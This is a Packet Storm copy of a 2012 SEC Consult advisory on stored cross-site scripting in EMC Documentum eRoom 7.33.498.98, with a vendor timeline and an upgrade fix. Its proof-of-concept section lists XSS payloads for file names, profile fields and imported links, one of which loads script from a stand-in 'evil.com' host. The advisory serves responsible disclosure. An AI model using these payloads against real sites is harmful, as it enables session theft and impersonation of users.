what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

EMC Documentum eRoom 7.33.498.98 Cross Site Scripting

EMC Documentum eRoom 7.33.498.98 Cross Site Scripting
Posted Mar 16, 2012
Authored by F. Lukavsky, B. Schildendorfer | Site sec-consult.com

EMC Documentum eRoom version 7.33.498.98 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 9339995995b0ec5644fade6d3de25a0a2a0bd885417c0336349031a156ec9ea2

EMC Documentum eRoom 7.33.498.98 Cross Site Scripting

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20120315-0 >
=======================================================================
title: Multiple permanent cross-site scripting vulnerabilities
product: EMC Documentum eRoom
vulnerable version: 7.33.498.98
fixed version: 7.4.4
impact: high
homepage: http://www.emc.com/products/detail/software2/eroom.htm
found: 2011-05-05
by: F. Lukavsky, B. Schildendorfer
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"EMC Documentum eRoom is easy-to-use online team collaboration software that
enables distributed teams to work together more efficiently. With Documentum
eRoom, teams around the world can accelerate document collaboration and group
activities, improve the development and delivery of products and services,
optimize collaborative business processes, improve innovation, and streamline
decision-making."

http://www.emc.com/products/detail/software2/eroom.htm


Vulnerability overview/description:
-----------------------------------
Documentum eRoom suffers from multiple permanent cross-site scripting
vulnerabilities, which allow an attacker to steal other user's sessions,
to impersonate other users and to gain unauthorized access to documents
hosted in eRooms. A JavaScript worm could be utilized to crawl an eRoom and
gather all available documents.

There are many parameters which are not properly sanitized and thus
vulnerable to XSS.


Proof of concept:
-----------------
1) Permanent Cross-Site Scripting within file names
The extension of files uploaded to Documentum eRoom are not sanitized. The
following file name would lead to execution of script code as soon as the
file is viewed (i.e. in the search results or the directory view)

file."><script>alert(1)</script>
."><script src="http://evil&#x26;#x2e;com/evil%2ejs"></script>
."><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>

2) Permanent Cross-Site Scripting within the personal information
Users can change their personal information. By editing the field
"organization" it is possible to store a malicious JavaScript payload
(e.g., <script>alert(1)</script>).
The payload gets executed every time a user visits a part of the website
responsible for alerting users about changes in the eRoom (i.e., "Choose
Members" for eRooms).

3) Cross-Site Scripting within Links
Via the import function it is possible to add formatted text to database
fields even when the eRoom Plugin is not utilized.
The following formatted text will create links that execute JavaScript code
once clicked:

"<div class=""user""><a
href=""&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)"">test</a></div>"
"<div class=""user""><a onclick=""alert(1)"">test</a></div>"

4) Unhandled protocol handlers in links
Although it is not possible to create links with the function "create link"
that execute JavaScript code via the protocol handler "javascript:", the
protocol handler "vbscript" is allowed and would execute VBScript, for example
in IE (e.g., "vbscript:alert(1)", "callto:+1900[premium-rate number]", etc.).


Vulnerable / tested versions:
-----------------------------
Documentum eRoom version 7.33.498.98


Vendor contact timeline:
------------------------
2011-11-22: Contacting vendor through security_alert@emc.com
2011-11-23: Vendor response, issue is being forwarded to the
appropriate product development team for review and
confirmation
2011-11-28: Vendor response, issue has been reviewed
affected version is not supported anymore
current version not affected by #1 and #3
additional information required for #2 and #4
2011-11-29: Providing additional information for #2 and #4
2011-11-30: Vendor cannot reproduce #2 and #4, asks for additional
information
2012-01-12: Call with vendor to clarify remaining issues.
2012-01-27: Vendor requests additional information regarding the test
environment in order to reproduce vulnerabilities #2 and #4
2012-03-13: EMC releases patch
2012-03-15: Public release of SEC Consult advisory


Solution:
---------
According to the vendor, these issues have been fixed in version 7.4.4 of
Documentum eRoom. Upgrade to the new release.


Workaround:
-----------
Restrict access to the software as much as possible. Only allow trusted
IP addresses and users in order to minimise attack surface. Do not host
confidential information in Documentum eRoom.


Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF F. Lukavsky / @2012

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close